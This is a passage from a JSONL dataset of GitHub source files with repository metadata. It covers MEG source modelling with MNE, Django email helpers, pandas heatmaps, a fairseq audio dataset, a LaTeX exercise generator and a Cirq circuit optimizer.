']\n lpa = pos.loc[pos.index == 'left ']\n rpa = pos.loc[pos.index == 'right ']\n\n # Get head points\n pos.drop(['nasion ', 'left ', 'right '], inplace=True)\n pos_array = pos.to_numpy()\n\n # Make montage\n dig_montage = mne.channels.make_dig_montage(nasion=nasion.values.ravel(), lpa=lpa.values.ravel(),\n rpa=rpa.values.ravel(), hsp=pos_array, coord_frame='unknown')\n\n # Make info object\n dig_info = meg_data.pick('meg').info.copy()\n dig_info.set_montage(montage=dig_montage)\n\n # Save raw instance with info\n info_raw = mne.io.RawArray(np.zeros((dig_info['nchan'], 1)), dig_info)\n dig_info_path = dig_path_subject + '/info_raw.fif'\n info_raw.save(dig_info_path, overwrite=True)\n\n # Align and save fiducials and transformation files to FreeSurfer/subject/bem folder\n mne.gui.coregistration(subject=subject.subject_id, subjects_dir=subjects_dir, inst=dig_info_path, block=True)\n\n # If subject has no MRI data\n except:\n subject_code = 'fsaverage'\n # Check mean distances if already run transformation\n trans_path = os.path.join(subjects_dir, subject_code, 'bem', f'{subject_code}-trans.fif')\n trans = mne.read_trans(trans_path)\n print('Distance from head origin to MEG origin: %0.1f mm'\n % (1000 * np.linalg.norm(meg_data.info['dev_head_t']['trans'][:3, 3])))\n print('Distance from head origin to MRI origin: %0.1f mm'\n % (1000 * np.linalg.norm(trans['trans'][:3, 3])))\n\n # --------- Bem model ---------#\n # Source data and models path\n sources_path = paths().sources_path()\n sources_path_subject = sources_path + subject.subject_id\n sources_path_fsaverage = sources_path + 'fsaverage'\n os.makedirs(sources_path_subject, exist_ok=True)\n os.makedirs(sources_path_fsaverage, exist_ok=True)\n\n fname_bem = sources_path + subject_code + f'/{subject_code}_bem_ico{ico}-sol.fif'\n try:\n # Load\n bem = mne.read_bem_solution(fname_bem)\n except:\n # Compute\n model = mne.make_bem_model(subject=subject_code, ico=ico, conductivity=[0.3], subjects_dir=subjects_dir)\n bem = mne.make_bem_solution(model)\n # Save\n mne.write_bem_solution(fname_bem, bem, overwrite=True)\n\n # --------- Background noise covariance ---------#\n noise_cov = functions_analysis.noise_cov(exp_info=exp_info, subject=subject, bads=meg_data.info['bads'], use_ica_data=use_ica_data)\n\n # # Extra\n # # Change head loc\n # head_loc_idx = 1\n # meg_data.info['dev_head_t'] = raws_list[head_loc_idx].info['dev_head_t']\n\n # --------- Raw data covariance ---------#\n # Pick meg channels for source modeling\n meg_data.pick('meg')\n\n # Compute covariance to withdraw from meg data\n data_cov = mne.compute_raw_covariance(meg_data, reject=dict(mag=4e-12), rank=None)\n\n # --------- Source space, forward model and inverse operator ---------#\n if surf_vol == 'volume':\n # Volume\n # Source model\n fname_src = sources_path + subject_code + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src = mne.read_source_spaces(fname_src)\n except:\n # Compute\n src = mne.setup_volume_source_space(subject=subject_code, subjects_dir=subjects_dir, bem=bem, pos=spacing,\n sphere_units='m', add_interpolator=True)\n # Save\n mne.write_source_spaces(fname_src, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_volume_ico{ico}_{int(spacing)}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n\n elif surf_vol == 'surface':\n # Surface\n # Source model\n fname_src = sources_path_subject + f'/{subject_code}_surface_ico{ico}-src.fif'\n try:\n # Load\n src = mne.read_source_spaces(fname_src)\n except:\n # Compute\n src = mne.setup_source_space(subject=subject_code, spacing=f'ico{ico}', subjects_dir=subjects_dir)\n # Save\n mne.write_source_spaces(fname_src, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_surface_ico{ico}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_surface_ico{ico}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n\n elif surf_vol == 'mixed':\n fname_src_mix = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src_surf = mne.read_source_spaces(fname_src_surf)\n except:\n # Mixed\n # Surface source model\n fname_src_surf = sources_path_subject + f'/{subject_code}_surface_ico{ico}-src.fif'\n try:\n # Load\n src_surf = mne.read_source_spaces(fname_src_surf)\n except:\n # Compute\n src_surf = mne.setup_source_space(subject=subject_code, spacing=f'ico{ico}', subjects_dir=subjects_dir)\n # Save\n mne.write_source_spaces(fname_src_surf, src_surf, overwrite=True)\n\n # Volume source model\n fname_src_vol = sources_path + subject_code + f'/{subject_code}_volume_ico{ico}_{int(spacing)}-src.fif'\n try:\n # Load\n src_vol = mne.read_source_spaces(fname_src_vol)\n except:\n # Compute\n src_vol = mne.setup_volume_source_space(subject=subject_code, subjects_dir=subjects_dir, bem=bem,\n pos=spacing, sphere_units='m', add_interpolator=True)\n # Save\n mne.write_source_spaces(fname_src_vol, src_vol, overwrite=True)\n\n # Mixed source space\n src = src_surf + src_vol\n # Save\n mne.write_source_spaces(fname_src_mix, src, overwrite=True)\n\n # Forward model\n fwd = mne.make_forward_solution(meg_data.info, trans=trans_path, src=src, bem=bem)\n fname_fwd = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}-fwd.fif'\n mne.write_forward_solution(fname_fwd, fwd, overwrite=True)\n\n # Spatial filter\n rank = sum([ch_type == 'mag' for ch_type in meg_data.get_channel_types()]) - len(meg_data.info['bads'])\n if use_ica_data:\n rank -= len(subject.ex_components)\n\n # Define linearly constrained minimum variance spatial filter\n # reg parameter is for regularization on rank deficient matrices (rank < channels)\n filters = beamformer.make_lcmv(info=meg_data.info, forward=fwd, data_cov=data_cov, reg=0.05,\n noise_cov=noise_cov, pick_ori=pick_ori, rank=dict(mag=rank))\n\n # Save\n fname_lmcv = sources_path_subject + f'/{subject_code}_mixed_ico{ico}_{int(spacing)}_{pick_ori}-lcmv.fif'\n filters.save(fname=fname_lmcv, overwrite=True)\n","repo_name":"jegonza66/MEGEYEHS","sub_path":"coreg-headmodel_setup.py","file_name":"coreg-headmodel_setup.py","file_ext":"py","file_size_in_byte":12028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11685052181","text":"import numpy as np\nimport torch\nimport random\nimport cv2\nfrom config import system_configs\n# from torch_geometric.data import Data,DataLoader\ndef kp_track(db, k_ind, data_aug=True, debug=False):\n batch_size = system_configs.batch_size\n images = []\n positions = np.zeros((batch_size,5,4), dtype=np.float32)\n last_positions= np.zeros((batch_size,2), dtype=np.float32)\n space = np.zeros((batch_size,6,16), dtype=np.float32)\n data_list = []\n labels = np.zeros((batch_size, ), dtype=np.float32)\n db_size = len(db.db_inds)\n\n for b_ind in range(batch_size):\n if k_ind==0:\n db.shuffle_inds()\n db_ind = db.db_inds[k_ind]\n k_ind = (k_ind + 1) % db_size\n\n pimg,labels[b_ind] = db.read_data(db_ind)\n pimgs,plist,pgraph = pimg[\"img\"],pimg[\"plist\"],pimg[\"graph\"]\n plist = np.array(plist)\n plist[:-1,0:2] += np.random.rand(6,2)*2-1\n # plist[:-1,2:4] += np.random.rand(6,2)*1-0.5\n plist[:-1,2:4] += plist[:-1,0:2]\n # temp_c = plist[:-2,-2:]-plist[1:-1,-2:]\n # temp_wh = plist[:-2,2:4]-plist[1:-1,2:4]\n # positions[b_ind]=np.hstack([temp_c,temp_wh])\n positions[b_ind]=plist[:-2,0:4]-plist[1:-1,0:4]\n last_positions[b_ind]=plist[-3,-2:]-plist[-1,-2:]\n temp_graph = []\n for i,g in enumerate(pgraph):\n # temp_c = g[:,-2:]\n temp_c = g[1:,-2:]-g[0,-2:]\n temp_wh = g[1:,2:4]\n temp = np.hstack([temp_c,temp_wh]).reshape(-1) + np.random.rand(16)*2-1\n space[b_ind,i]= temp\n # space[b_ind,i]= temp/10\n rate = 10\n positions = torch.from_numpy(positions/rate)\n last_positions = torch.from_numpy(last_positions/rate)\n labels = torch.from_numpy(labels)\n space = torch.clamp(torch.from_numpy(space),min=-20,max=20)/rate\n\n return {\n \"xs\": [images,positions,space],\n \"ys\": [labels,last_positions]\n },k_ind\n\ndef sample_data(db, k_ind, data_aug=True, debug=False):\n return globals()[system_configs.sampling_function](db, k_ind, data_aug, debug)","repo_name":"jiefeng0109/CKDNet-SMTNet","sub_path":"SMTNet/sample/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"11916505216","text":"from datetime import datetime\nfrom os.path import splitext\n\nfrom django.template.loader import render_to_string\nfrom django.core.signing import Signer\n\nfrom bboard.settings import ALLOWED_HOSTS\n\n\nsigner = Signer() # creating unique user's signe\n\n\ndef send_activation_notification(user):\n \"\"\"Form and send letter for user's activation\"\"\"\n\n if ALLOWED_HOSTS: # finding site's host\n host = 'http://' + ALLOWED_HOSTS[0]\n else:\n host = 'http://localhost:8000'\n\n context = {'user': user, 'host': host, 'sign': signer.sign(user.username)}\n subject = render_to_string('email/activation_letter_subject.txt', context)\n body_text = render_to_string('email/activation_letter_body.txt', context)\n user.email_user(subject, body_text)\n\n\ndef send_new_comment_notification(comment):\n \"\"\"\n Form and send letter to ad's author,\n if somebody left comment for author's ad.\n :param comment:\n :return:\n \"\"\"\n if ALLOWED_HOSTS:\n host = 'http://' + ALLOWED_HOSTS[0]\n else:\n host = 'http://localhost:8000'\n\n author = comment.bb.author\n context = {'author': author, 'host': host, 'comment': comment}\n subject = render_to_string('email/new_comment_letter_subject.txt', context)\n body_text = render_to_string('email/new_comment_letter_body.txt', context)\n author.email_user(subject, body_text)\n\n\ndef get_timestamp_path(instance, filename):\n \"\"\"Generate name for loaded and saved file in model\"\"\"\n return '%s%s' % (datetime.now().timestamp(), splitext(filename)[1])\n","repo_name":"MaxGonchar/django_cheat_sheet_project","sub_path":"main/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73465647555","text":"import json\nimport typing as tp\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom datetime import datetime\nfrom matplotlib.figure import Figure\n\nimport os\nimport sys\n\nf = open(os.devnull, 'w')\nsys.stderr = f\n\n\nclass YouTube2:\n df: pd.DataFrame\n p_table: pd.DataFrame.pivot_table\n p_table_pro: pd.DataFrame.pivot_table\n\n def __init__( # task0\n self,\n trends_df_path: str = 'RUvideos_short.csv',\n categories_df_path: str = 'RU_category_id.json'\n ):\n self.trends_df = pd.read_csv(\n trends_df_path, parse_dates=['trending_date'],\n date_parser=(\n lambda x: pd.to_datetime(x, format='%y.%d.%m')\n )\n )\n\n with open(categories_df_path) as json_file:\n json_data = json.load(json_file)\n\n self.categories_df = pd.DataFrame(columns=['id', 'name'])\n\n for item in json_data['items']:\n self.categories_df = self.categories_df.append(\n {'id': int(item['id']),\n 'name': item['snippet']['title']},\n ignore_index=True\n )\n\n self.categories_df['id'] = self.categories_df['id'].astype(int)\n\n def task1(self) -> pd.DataFrame:\n self.df = self.trends_df.merge(self.categories_df, left_on='category_id', right_on='id')\n return self.df\n\n def task2(self) -> pd.DataFrame:\n self.p_table = pd.pivot_table(self.df, index='name', columns='trending_date', values='views', aggfunc=np.sum)\n return self.p_table\n\n def task3(self) -> Figure:\n sns.heatmap(self.p_table.apply(lambda x: x / 1e6), annot=True)\n plt.title('heatmap')\n return plt.gcf()\n\n def task4(self) -> pd.DataFrame:\n self.df.trending_date = self.df.trending_date.dt.day\n self.p_table_pro = pd.pivot_table(self.df, index='name', columns='trending_date', values='views',\n margins=True, margins_name='Всего', aggfunc=np.sum)\n return self.p_table_pro\n\n def task5(self): # -> Figure:\n mask = np.zeros((16, 9))\n mask[:, 8] = True\n mask[15, :] = True\n mask2 = np.zeros((16, 9))\n mask2[15, 8] = True\n self.p_table_pro = self.p_table_pro.apply(lambda x: x / 1e6)\n sns.heatmap(self.p_table_pro, alpha=0, cbar=False, annot=True, annot_kws={'color': 'black'},\n mask=mask2, fmt='.1f')\n sns.heatmap(self.p_table_pro, vmax=5, mask=mask, annot=True, fmt='.1f',\n cbar_kws={'label': 'Количество просмотров (млн)'})\n\n plt.title('Тепловая карта просмотров')\n plt.ylabel('Категория видео')\n plt.xlabel('Число (ноябрь 2017)')\n # return plt.gcf()\n","repo_name":"hxzwww/data_analysis","sub_path":"n2/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27636077112","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nUsage::\n\n hammer sync-plan [OPTIONS] SUBCOMMAND [ARG] ...\n\nParameters::\n\n SUBCOMMAND subcommand\n [ARG] ... subcommand arguments\n\nSubcommands::\n\n create Create a sync plan\n delete Destroy a sync plan\n info Show a sync plan\n list List sync plans\n update\n\"\"\"\n\nfrom robottelo.cli.base import Base\n\n\nclass SyncPlan(Base):\n \"\"\"\n Manipulates Katello engine's sync-plan command.\n \"\"\"\n\n command_base = 'sync-plan'\n command_requires_org = True\n\n @classmethod\n def create(cls, options=None):\n cls.command_requires_org = False\n\n try:\n result = super(SyncPlan, cls).create(options)\n finally:\n cls.command_requires_org = True\n\n return result\n\n @classmethod\n def info(cls, options=None):\n cls.command_requires_org = False\n\n try:\n result = super(SyncPlan, cls).info(options)\n finally:\n cls.command_requires_org = True\n\n return result\n","repo_name":"san7ket/robottelo","sub_path":"robottelo/cli/syncplan.py","file_name":"syncplan.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"36998054525","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n # 动态规划\n # 1. 分治问题: 第i个元素为结尾的的最大连续子数组的和, max_sub(i) = Max(max_sub(i - 1), 0) + nums[i])\n # 2. 定义状态数组: dp[i] 表示第i个元素为结尾的的最大连续子数组的和\n # 3. ���义状态方程: dp[i] = Max(dp[i - 1], 0) + nums[i]\n\n dp = nums\n for i in range(1, len(dp)):\n dp[i] = max(dp[i - 1], 0) + nums[i]\n \n return max(dp)","repo_name":"algorithm006-class02/algorithm006-class02","sub_path":"Week_05/G20200343030632/Leetcode_53_632.py","file_name":"Leetcode_53_632.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"zh","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"72920356034","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\n\napp = Flask(__name__)\n# app.config('SQLALCHEMY_DATABASE_URI') = environ.get('DATABASE_URL', 'sqlite:///leaflet.sqlite')\n\ndb = SQLAlchemy(app)\nclass Quakes(db.Model):\n __tablename__ = 'quakes'\n\n\n\n@app.route('/')\ndef index(): \n return render_template('index.html')\n\n# @app.route('/api/quakes') \n\nif __name__ == '__main__': \n app.run(debug=True)\n\n","repo_name":"LeeProut/leaflet-heroku","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33953558126","text":"class Solution(object):\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n smallest = 1\n num_dict = {}\n for num in nums:\n num_dict[num] = 1\n while smallest < 2147483648:\n if smallest not in num_dict:\n return smallest\n smallest += 1\n #return \n \n","repo_name":"gabedonnan/Leetcode-Solutions","sub_path":"smallest-missing-positive.py","file_name":"smallest-missing-positive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"12201672185","text":"from fairseq import models\nfrom fairseq.dataclass.utils import convert_namespace_to_omegaconf\nfrom fairseq import (\n checkpoint_utils,\n distributed_utils,\n options,\n quantization_utils,\n tasks,\n utils,\n)\n\nimport os\nimport soundfile as sf\nfrom fairseq.data.audio.raw_audio_dataset import * \nimport torch.utils.data as data\nfrom torch.utils.data.sampler import WeightedRandomSampler\nimport librosa\nimport numpy as np\nimport random\n\nclass SpeechCommandsDataset(RawAudioDataset):\n \n #sil=0.1, np=0.5, nl=0.7, sp=0.5, mp=0.5\n def __init__(self, CLASSES, mode='train', root=''):\n super(SpeechCommandsDataset, self).__init__(\n sample_rate=16000,\n pad=False\n ) \n self.CLASSES = CLASSES\n self.mode = mode\n self.root = root\n self.mode_root = os.path.join(root,self.mode)\n self.sample_rate = 16000\n self.data = list()\n self.prep_dataset()\n self.y1 = 0\n self.x1 = 0\n\n if self.mode=='training':\n self.shift_prob = 0.5 \n self.mask_prob = 0.5 \n self.mask_len = 0.1 \n \n \n def prep_dataset(self): \n \n self.id = 0\n for c in self.CLASSES: \n for root, dir, files in os.walk(os.path.join(os.getcwd(),self.mode_root,c)):\n for file in files:\n f_path, cmd = os.path.join(root, file), c \n self.data.append((f_path, cmd, self.id))\n self.id += 1\n #print(f\"{self.mode} data number: {len(self.data)}\")\n \n def __getitem__(self, idx): \n f_path, cmd, id = self.data[idx]\n wav, curr_sample_rate = sf.read(f_path)\n try :\n self.x1, self.y1 = wav.shape\n except:\n self.x1 = wav.shape\n\n if curr_sample_rate!=self.sample_rate: \n wav, curr_sample_rate = librosa.resample(wav, curr_sample_rate, self.sample_rate), self.sample_rate\n \n if self.y1==2:\n wav = librosa.to_mono(wav.transpose(1,0)) \n self.y1 = 0\n wav_len = len(wav)\n if wav_len < self.sample_rate:\n pad_size = self.sample_rate - wav_len\n wav = np.pad(wav, (round(pad_size/2)+1,round(pad_size/2)+1), 'constant', constant_values=0)\n\n wav_len = len(wav)\n mid = int(len(wav)/2)\n cut_off = int(self.sample_rate/2)\n wav = wav[mid-cut_off:mid+cut_off] \n \n\n if self.mode=='training': \n if random.random()1:\n\tif sys.argv[1]==\"test\":\n\t\ttipo = \"test\"\n\t\tnum_esercizi = 0\n\telif sys.argv[1]==\"real\":\n\t\ttipo = \"real\"\n\t\tnum_esercizi = 0\n\telif sys.argv[1]==\"W\":\n\t\ttipo = \"W\"\n\t\tnum_esercizi = 0\n\telse:\n\t\tnum_esercizi = int(sys.argv[1])\nelse:\n\ttipo = \"test\"\t\n\tflag_compila=True\n\nif len(sys.argv)==3:\n\tflag_compila=True\n\nNOME_TEMP = \"template.tex\"\nNOME_OUT = \"esercizio\"\n\n\n\nwith open(NOME_TEMP,\"r\") as t:\n\ttemplate = t.read()\nstringone = compila_documento(tipo)\n\ntemplate = template.replace('ESERCIZI',stringone)\n\nwith open(f'{NOME_OUT}.tex', \"w\") as t_out:\n\tt_out.write(template)\nprint()\nif flag_compila:\n\tsubprocess.run([\"pdflatex\",NOME_OUT],stdout=subprocess.DEVNULL)\n\t#subprocess.run([\"pdflatex\",NOME_OUT])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.aux'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.log'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.toc'])\n\tsubprocess.run([\"rm\", f'{NOME_OUT}.out'])\n","repo_name":"michelelaig/LinearSystemAutomaticStudy","sub_path":"generatore.py","file_name":"generatore.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"8767585909","text":"from typing import Optional, cast, TYPE_CHECKING, Iterable, Tuple, Dict, List\nimport sympy\n\nfrom cirq import circuits, ops, value, protocols\nfrom cirq.optimizers import decompositions\n\nif TYPE_CHECKING:\n import cirq\n\n\nclass _OptimizerState:\n def __init__(self):\n # The phases of the W gates currently being pushed along each qubit.\n self.held_w_phases: Dict[ops.Qid, value.TParamVal] = {}\n\n # Accumulated commands to batch-apply to the circuit later.\n self.deletions: List[Tuple[int, ops.Operation]] = []\n self.inline_intos: List[Tuple[int, ops.Operation]] = []\n self.insertions: List[Tuple[int, ops.Operation]] = []\n\n\nclass EjectPhasedPaulis():\n \"\"\"Pushes X, Y, and PhasedX gates towards the end of the circuit.\n\n As the gates get pushed, they may absorb Z gates, cancel against other\n X, Y, or PhasedX gates with exponent=1, get merged into measurements (as\n output bit flips), and cause phase kickback operations across CZs (which can\n then be removed by the EjectZ optimization).\n \"\"\"\n\n def __init__(self,\n tolerance: float = 1e-8,\n eject_parameterized: bool = False) -> None:\n \"\"\"\n Args:\n tolerance: Maximum absolute error tolerance. The optimization is\n permitted to simply drop negligible combinations gates with a\n threshold determined by this tolerance.\n eject_parameterized: If True, the optimization will attempt to eject\n parameterized gates as well. This may result in other gates\n parameterized by symbolic expressions.\n \"\"\"\n self.tolerance = tolerance\n self.eject_parameterized = eject_parameterized\n\n def optimize_circuit(self, circuit: circuits.Circuit):\n state = _OptimizerState()\n\n for moment_index, moment in enumerate(circuit):\n for op in moment.operations:\n affected = [q for q in op.qubits if q in state.held_w_phases]\n\n # Collect, phase, and merge Ws.\n w = _try_get_known_phased_pauli(\n op, no_symbolic=not self.eject_parameterized)\n if w is not None:\n if decompositions.is_negligible_turn(\n w[0] - 1,\n self.tolerance):\n _potential_cross_whole_w(moment_index,\n op,\n self.tolerance,\n state)\n else:\n _potential_cross_partial_w(moment_index, op, state)\n continue\n\n if not affected:\n continue\n\n # Absorb Z rotations.\n t = _try_get_known_z_half_turns(\n op, no_symbolic=not self.eject_parameterized)\n if t is not None:\n _absorb_z_into_w(moment_index, op, state)\n continue\n\n # Dump coherent flips into measurement bit flips.\n if isinstance(op.gate, ops.MeasurementGate):\n _dump_into_measurement(moment_index, op, state)\n\n # Cross CZs using kickback.\n if _try_get_known_cz_half_turns(\n op,\n no_symbolic=not self.eject_parameterized) is not None:\n if len(affected) == 1:\n _single_cross_over_cz(moment_index,\n op,\n affected[0],\n state)\n else:\n _double_cross_over_cz(op, state)\n continue\n\n # Don't know how to handle this situation. Dump the gates.\n _dump_held(op.qubits, moment_index, state)\n\n # Put anything that's still held at the end of the circuit.\n _dump_held(state.held_w_phases.keys(), len(circuit), state)\n\n circuit.batch_remove(state.deletions)\n circuit.batch_insert_into(state.inline_intos)\n circuit.batch_insert(state.insertions)\n\n\ndef _absorb_z_into_w(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Absorbs a Z^t gate into a W(a) flip.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───Z^t───\n ≡ ───W(a)───────────Z^t/2──────────Z^t/2─── (split Z)\n ≡ ───W(a)───W(a)───Z^-t/2───W(a)───Z^t/2─── (flip Z)\n ≡ ───W(a)───W(a)──────────W(a+t/2)───────── (phase W)\n ≡ ────────────────────────W(a+t/2)───────── (cancel Ws)\n ≡ ───W(a+t/2)───\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_z_half_turns(op))\n q = op.qubits[0]\n state.held_w_phases[q] += t / 2\n state.deletions.append((moment_index, op))\n\n\ndef _dump_held(qubits: Iterable[ops.Qid],\n moment_index: int,\n state: _OptimizerState):\n # Note: sorting is to avoid non-determinism in the insertion order.\n for q in sorted(qubits):\n p = state.held_w_phases.get(q)\n if p is not None:\n dump_op = ops.PhasedXPowGate(phase_exponent=p).on(q)\n state.insertions.append((moment_index, dump_op))\n state.held_w_phases.pop(q, None)\n\n\ndef _dump_into_measurement(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n measurement = cast(ops.MeasurementGate, cast(ops.GateOperation, op).gate)\n new_measurement = measurement.with_bits_flipped(\n *[i for i, q in enumerate(op.qubits) if q in state.held_w_phases]).on(\n *op.qubits)\n for q in op.qubits:\n state.held_w_phases.pop(q, None)\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, new_measurement))\n\n\ndef _potential_cross_whole_w(moment_index: int,\n op: ops.Operation,\n tolerance: float,\n state: _OptimizerState) -> None:\n \"\"\"Grabs or cancels a held W gate against an existing W gate.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───W(b)───\n ≡ ───Z^-a───X───Z^a───Z^-b───X───Z^b───\n ≡ ───Z^-a───Z^-a───Z^b───X───X───Z^b───\n ≡ ───Z^-a───Z^-a───Z^b───Z^b───\n ≡ ───Z^2(b-a)───\n \"\"\"\n state.deletions.append((moment_index, op))\n\n _, phase_exponent = cast(Tuple[value.TParamVal, value.TParamVal],\n _try_get_known_phased_pauli(op))\n q = op.qubits[0]\n a = state.held_w_phases.get(q, None)\n b = phase_exponent\n\n if a is None:\n # Collect the gate.\n state.held_w_phases[q] = b\n else:\n # Cancel the gate.\n del state.held_w_phases[q]\n t = 2*(b - a)\n if not decompositions.is_negligible_turn(t / 2, tolerance):\n leftover_phase = ops.Z(q)**t\n state.inline_intos.append((moment_index, leftover_phase))\n\n\ndef _potential_cross_partial_w(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Cross the held W over a partial W gate.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───W(b)^t───\n ≡ ───Z^-a───X───Z^a───W(b)^t────── (expand W(a))\n ≡ ───Z^-a───X───W(b-a)^t───Z^a──── (move Z^a across, phasing axis)\n ≡ ───Z^-a───W(a-b)^t───X───Z^a──── (move X across, negating axis angle)\n ≡ ───W(2a-b)^t───Z^-a───X───Z^a─── (move Z^-a across, phasing axis)\n ≡ ───W(2a-b)^t───W(a)───\n \"\"\"\n a = state.held_w_phases.get(op.qubits[0], None)\n if a is None:\n return\n exponent, phase_exponent = cast(Tuple[value.TParamVal, value.TParamVal],\n _try_get_known_phased_pauli(op))\n new_op = ops.PhasedXPowGate(\n exponent=exponent,\n phase_exponent=2 * a - phase_exponent).on(op.qubits[0])\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, new_op))\n\n\ndef _single_cross_over_cz(moment_index: int, op: ops.Operation,\n qubit_with_w: 'cirq.Qid',\n state: _OptimizerState) -> None:\n \"\"\"Crosses exactly one W flip over a partial CZ.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n\n ──────────@─────\n │\n ───W(a)───@^t───\n\n\n ≡ ───@──────O──────@────────────────────\n | | │ (split into on/off cases)\n ───W(a)───W(a)───@^t──────────────────\n\n ≡ ───@─────────────@─────────────O──────\n | │ | (off doesn't interact with on)\n ───W(a)──────────@^t───────────W(a)───\n\n ≡ ───────────Z^t───@──────@──────O──────\n │ | | (crossing causes kickback)\n ─────────────────@^-t───W(a)───W(a)─── (X Z^t X Z^-t = exp(pi t) I)\n\n ≡ ───────────Z^t───@────────────────────\n │ (merge on/off cases)\n ─────────────────@^-t───W(a)──────────\n\n ≡ ───Z^t───@──────────────\n │\n ─────────@^-t───W(a)────\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_cz_half_turns(op))\n other_qubit = op.qubits[0] if qubit_with_w == op.qubits[1] else op.qubits[1]\n negated_cz = ops.CZ(*op.qubits)**-t\n kickback = ops.Z(other_qubit)**t\n\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, negated_cz))\n state.insertions.append((moment_index, kickback))\n\n\ndef _double_cross_over_cz(op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Crosses two W flips over a partial CZ.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n\n ───W(a)───@─────\n │\n ───W(b)───@^t───\n\n\n ≡ ──────────@────────────W(a)───\n │ (single-cross top W over CZ)\n ───W(b)───@^-t─────────Z^t────\n\n\n ≡ ──────────@─────Z^-t───W(a)───\n │ (single-cross bottom W over CZ)\n ──────────@^t───W(b)───Z^t────\n\n\n ≡ ──────────@─────W(a)───Z^t────\n │ (flip over Z^-t)\n ──────────@^t───W(b)───Z^t────\n\n\n ≡ ──────────@─────W(a+t/2)────���─\n │ (absorb Zs into Ws)\n ──────────@^t───W(b+t/2)──────\n\n ≡ ───@─────W(a+t/2)───\n │\n ───@^t───W(b+t/2)───\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_cz_half_turns(op))\n for q in op.qubits:\n state.held_w_phases[q] = cast(value.TParamVal,\n state.held_w_phases[q]) + t / 2\n\n\ndef 